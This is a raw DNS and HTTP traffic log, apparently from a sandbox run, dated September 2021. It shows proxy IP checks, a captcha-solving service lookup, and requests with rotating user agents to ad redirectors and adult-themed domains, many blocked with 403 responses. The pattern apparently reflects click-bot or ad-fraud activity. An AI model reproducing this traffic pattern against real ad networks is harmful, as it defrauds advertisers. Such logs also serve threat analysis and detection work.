DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSp123.xyzRequestp123.xyzIN AResponsep123.xyzIN A2.57.89.186
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A13.226.155.74nkwintenc.bizIN A13.226.155.21nkwintenc.bizIN A13.226.155.26nkwintenc.bizIN A13.226.155.122
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSxxx2.xnxxxx.ruRequestxxx2.xnxxxx.ruIN AResponsexxx2.xnxxxx.ruIN A2.57.89.186
-
DNShemadrometeranddepository.xyzRequesthemadrometeranddepository.xyzIN AResponsehemadrometeranddepository.xyzIN A34.196.13.28
-
GEThttp://hemadrometeranddepository.xyz/RequestGET / HTTP/1.1
Host: hemadrometeranddepository.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:34 GMT
Content-Type: text/html
Content-Length: 950
Connection: close
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
-
GEThttp://alfad.pro/go/266933/627598RequestGET /go/266933/627598 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:34 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/622367RequestGET /go/266933/622367 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:34 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSgoogleads.g.doubleclick.netRequestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A142.250.179.162
-
DNSws.zoominfo.comRequestws.zoominfo.comIN AResponsews.zoominfo.comIN A104.16.168.82ws.zoominfo.comIN A104.16.101.12
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNSstatic.formstack.comRequeststatic.formstack.comIN AResponsestatic.formstack.comIN CNAMEformstack.comformstack.comIN A52.222.139.63formstack.comIN A52.222.139.105formstack.comIN A52.222.139.76formstack.comIN A52.222.139.46
-
DNSmaswo.ruRequestmaswo.ruIN AResponsemaswo.ruIN A212.107.18.203
-
GEThttp://maswo.ru/adv.htmlRequestGET /adv.html HTTP/1.1
Host: maswo.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:40 GMT
Content-Length: 57786
Connection: close
-
DNScdn-geuw1-xch.media.netRequestcdn-geuw1-xch.media.netIN AResponsecdn-geuw1-xch.media.netIN CNAMEwildcard.media.net.edgekey.netwildcard.media.net.edgekey.netIN CNAMEe607.e11.akamaiedge.nete607.e11.akamaiedge.netIN A23.62.140.165
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNSgo.mobredirect.netRequestgo.mobredirect.netIN AResponsego.mobredirect.netIN A173.236.118.100
-
DNShblg.media.netRequesthblg.media.netIN AResponsehblg.media.netIN A2.16.118.158
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
POSThttp://789ff.info/adu.phpRequestPOST /adu.php HTTP/1.1
Host: 789ff.info
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Avast/70.1.973.110
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:45 GMT
Content-Length: 57785
Connection: close
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.21elevisions.bizIN A65.9.73.41elevisions.bizIN A65.9.73.56elevisions.bizIN A65.9.73.69
-
GEThttp://elevisions.biz/redirect?tid=934051RequestGET /redirect?tid=934051 HTTP/1.1
Host: elevisions.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://txxx.uk/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.215api.bitninja.ioIN A148.72.132.216
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSqitan.ruRequestqitan.ruIN AResponseqitan.ruIN A212.107.18.203
-
DNSteentube.usRequestteentube.usIN AResponseteentube.usIN A167.86.121.34
-
DNS789ff.fr.amRequest789ff.fr.amIN AResponse789ff.fr.amIN A212.107.18.203
-
DNSmasde.liveRequestmasde.liveIN AResponsemasde.liveIN A212.107.18.203
-
DNSxxxass.xyzRequestxxxass.xyzIN AResponsexxxass.xyzIN A207.180.237.38
-
DNS51789.ruRequest51789.ruIN AResponse51789.ruIN A212.107.18.203
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
GEThttp://teentube.us/index.htmlRequestGET /index.html HTTP/1.1
Host: teentube.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:49 GMT
Content-Type: text/html
Content-Length: 242
Last-Modified: Mon, 07 Jun 2021 06:25:53 GMT
Connection: keep-alive
ETag: "60bdbbf1-f2"
Accept-Ranges: bytes
-
GEThttp://alfad.pro/go/266933/629202RequestGET /go/266933/629202 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:50 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 270
Connection: keep-alive
-
POSThttp://qitan.ru/ads.phpRequestPOST /ads.php HTTP/1.1
Host: qitan.ru
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:50 GMT
Content-Length: 57785
Connection: close
-
GEThttp://789ff.fr.am/ung.phpRequestGET /ung.php HTTP/1.1
Host: 789ff.fr.am
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.0.1508 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:50 GMT
Content-Length: 57785
Connection: close
-
POSThttp://masde.live/adw.phpRequestPOST /adw.php HTTP/1.1
Host: masde.live
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99 (Edition 360-1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:50 GMT
Content-Length: 57785
Connection: close
-
GEThttp://xxxass.xyz/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: xxxass.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/44.0.2403.89 Chrome/44.0.2403.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://51789.ru/adv.htmlRequestGET /adv.html HTTP/1.1
Host: 51789.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:50 GMT
Content-Length: 57786
Connection: close
-
GEThttp://alfad.pro/ad/ad?p=266933&w=629200&t=3c8087d5f60bd218&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=629200&t=3c8087d5f60bd218&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/629200
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:54 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNScsm.fr.eu.criteo.netRequestcsm.fr.eu.criteo.netIN AResponsecsm.fr.eu.criteo.netIN CNAMEcsm.par.vip.prod.criteo.netcsm.par.vip.prod.criteo.netIN A178.250.0.162
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSsecurepubads.g.doubleclick.netRequestsecurepubads.g.doubleclick.netIN AResponsesecurepubads.g.doubleclick.netIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSmaoss.infoRequestmaoss.infoIN AResponsemaoss.infoIN A5.181.218.143
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNScrjugate.comRequestcrjugate.comIN AResponsecrjugate.comIN A93.93.51.223
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNS52d8.infoRequest52d8.infoIN AResponse52d8.infoIN A212.107.18.203
-
DNSxxx5.plive.xyzRequestxxx5.plive.xyzIN AResponsexxx5.plive.xyzIN CNAMEplive.xyzplive.xyzIN A194.59.164.58
-
DNSdkre4lyk6a9bt.cloudfront.netRequestdkre4lyk6a9bt.cloudfront.netIN AResponsedkre4lyk6a9bt.cloudfront.netIN A13.227.211.185dkre4lyk6a9bt.cloudfront.netIN A13.227.211.209dkre4lyk6a9bt.cloudfront.netIN A13.227.211.197dkre4lyk6a9bt.cloudfront.netIN A13.227.211.2
-
GEThttp://maoss.info/adu.phpRequestGET /adu.php HTTP/1.1
Host: maoss.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Length: 57785
Connection: close
-
GEThttp://alfad.pro/go/266933/627608RequestGET /go/266933/627608 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:56 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/629197RequestGET /go/266933/629197 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:56 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
POSThttp://52d8.info/adu.phpRequestPOST /adu.php HTTP/1.1
Host: 52d8.info
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Length: 57785
Connection: close
-
GEThttp://xxx5.plive.xyz/xxx5.phpRequestGET /xxx5.php HTTP/1.1
Host: xxx5.plive.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Length: 13730
Connection: close
-
GEThttp://dkre4lyk6a9bt.cloudfront.net/?lerkd=936385RequestGET /?lerkd=936385 HTTP/1.1
Host: dkre4lyk6a9bt.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B668564439A118785T1297416P2) like Gecko
Accept: */*
Referer: http://jav69.vip/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48638
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:50:56 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 d3fdd96b3ada000b1a8c2d522534c125.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: J1crh1LviuOCFhQqXV0kXx3zURyeB8HV6m1eGg8TsmjFKnheuA3jVg==
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.216api.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.215
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
DNSsee-porn.comRequestsee-porn.comIN AResponsesee-porn.comIN A167.86.103.60
-
DNSnsparket.topRequestnsparket.topIN AResponsensparket.topIN A172.67.192.135nsparket.topIN A104.21.52.2
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627541&t=d68a4e3d8c65c0d6&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627541&t=d68a4e3d8c65c0d6&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.15 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627541
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:50:56 GMT
Location: https://www.arminius.io/17/jump.php?zoneid=627541
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.21elevisions.bizIN A65.9.73.69elevisions.bizIN A65.9.73.41elevisions.bizIN A65.9.73.56
-
DNSwww.gstatic.comRequestwww.gstatic.comIN AResponsewww.gstatic.comIN A142.251.36.3
-
DNSwww3.freeslut.xyzRequestwww3.freeslut.xyzIN AResponsewww3.freeslut.xyzIN A194.59.164.58
-
GEThttp://alfad.pro/go/266933/627603RequestGET /go/266933/627603 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:56 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://maodes.com/adv.htmlRequestGET /adv.html HTTP/1.1
Host: maodes.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Length: 57786
Connection: close
-
GEThttp://see-porn.com/eva.htmlRequestGET /eva.html HTTP/1.1
Host: see-porn.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:56 GMT
Content-Type: text/html
Content-Length: 123
Last-Modified: Thu, 02 Sep 2021 08:30:53 GMT
Connection: keep-alive
ETag: "61308bbd-7b"
Accept-Ranges: bytes
-
GEThttp://nsparket.top/redirect?tid=917711RequestGET /redirect?tid=917711 HTTP/1.1
Host: nsparket.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
